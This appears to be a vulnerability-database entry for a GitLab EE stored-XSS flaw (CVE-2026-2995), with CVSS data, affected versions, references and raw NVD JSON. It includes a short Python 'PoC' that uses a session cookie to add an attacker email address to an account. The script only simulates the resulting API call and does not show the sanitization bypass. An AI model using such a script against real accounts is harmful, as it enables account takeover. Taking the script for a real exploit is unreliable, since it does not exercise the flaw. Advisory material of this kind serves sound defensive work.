Security Vulnerability Report
CVE-2026-2995 CVSS 7.7 HIGH

CVE-2026-2995

Published: 2026-03-25 17:16:58
Last Modified: 2026-03-26 17:42:57

Description

GitLab has remediated an issue in GitLab EE affecting all versions from 15.4 before 18.8.7, 18.9 before 18.9.3, and 18.10 before 18.10.1 that could have allowed an authenticated user to add email addresses to targeted user accounts due to improper sanitization of HTML content.

CVSS Details

CVSS Score: 7.7
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N

These are the vendor-assigned (secondary) metrics. The NVD primary assessment in the raw JSON record below rates the same issue 5.4 MEDIUM (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N); the recorded weaknesses are CWE-79 and CWE-80.

Configurations (Affected Products)

cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*       GitLab EE >= 15.4, < 18.8.7    - VULNERABLE
cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*       GitLab EE >= 18.9, < 18.9.3    - VULNERABLE
cpe:2.3:a:gitlab:gitlab:18.10.0:*:*:*:enterprise:*:*:* GitLab EE >= 18.10, < 18.10.1  - VULNERABLE

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# PoC for CVE-2026-2995: GitLab EE HTML Sanitization Bypass
# This script simulates the API call that would be triggered by the stored XSS payload.
TARGET_URL = "https://gitlab.example.com/api/v4/user/emails"

# Requires a valid session cookie of an authenticated user
COOKIE = "_gitlab_session=valid_session_cookie_here"
ATTACKER_EMAIL = "[email protected]"

headers = {
    "Cookie": COOKIE,
    "Content-Type": "application/json",
    "X-Requested-With": "XMLHttpRequest",
}

# Payload to add email
data = {"email": ATTACKER_EMAIL}

print(f"[*] Attempting to add {ATTACKER_EMAIL} to the account...")
try:
    response = requests.post(TARGET_URL, json=data, headers=headers)
    if response.status_code == 201:
        print("[+] Success: Email added via XSS trigger simulation.")
    else:
        print(f"[-] Failed: {response.status_code} - {response.text}")
except Exception as e:
    print(f"[!] Error: {e}")
```

References

https://about.gitlab.com/releases/2026/03/25/patch-release-gitlab-18-10-1-released/ (Release Notes, Vendor Advisory)
https://gitlab.com/gitlab-org/gitlab/-/work_items/591065 (Broken Link)
https://hackerone.com/reports/3564600 (Permissions Required)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-2995",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-25T17:16:58.347",
    "lastModified": "2026-03-26T17:42:57.473",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "GitLab has remediated an issue in GitLab EE affecting all versions from 15.4 before 18.8.7, 18.9 before 18.9.3, and 18.10 before 18.10.1 that could have allowed an authenticated user to add email addresses to targeted user accounts due to improper sanitization of HTML content."
      },
      {
        "lang": "es",
        "value": "GitLab ha remediado un problema en GitLab EE que afecta a todas las versiones desde la 15.4 anteriores a la 18.8.7, la 18.9 anteriores a la 18.9.3, y la 18.10 anteriores a la 18.10.1 que podría haber permitido a un usuario autenticado añadir direcciones de correo electrónico a cuentas de usuario objetivo debido a una sanitización inadecuada del contenido HTML."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N",
            "baseScore": 7.7,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.3,
          "impactScore": 5.8
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-80"}]},
      {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*",
                "versionStartIncluding": "15.4.0",
                "versionEndExcluding": "18.8.7",
                "matchCriteriaId": "022646FF-38A8-4EB1-A783-2C1E7DD3505A"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*",
                "versionStartIncluding": "18.9.0",
                "versionEndExcluding": "18.9.3",
                "matchCriteriaId": "C3240349-67A3-43E2-BAD9-EFAA3E0A5D31"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:gitlab:gitlab:18.10.0:*:*:*:enterprise:*:*:*",
                "matchCriteriaId": "2B8DF779-B99E-4096-B734-78AB1849D136"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://about.gitlab.com/releases/2026/03/25/patch-release-gitlab-18-10-1-released/",
        "source": "[email protected]",
        "tags": ["Release Notes", "Vendor Advisory"]
      },
      {
        "url": "https://gitlab.com/gitlab-org/gitlab/-/work_items/591065",
        "source": "[email protected]",
        "tags": ["Broken Link"]
      },
      {
        "url": "https://hackerone.com/reports/3564600",
        "source": "[email protected]",
        "tags": ["Permissions Required"]
      }
    ]
  }
}
```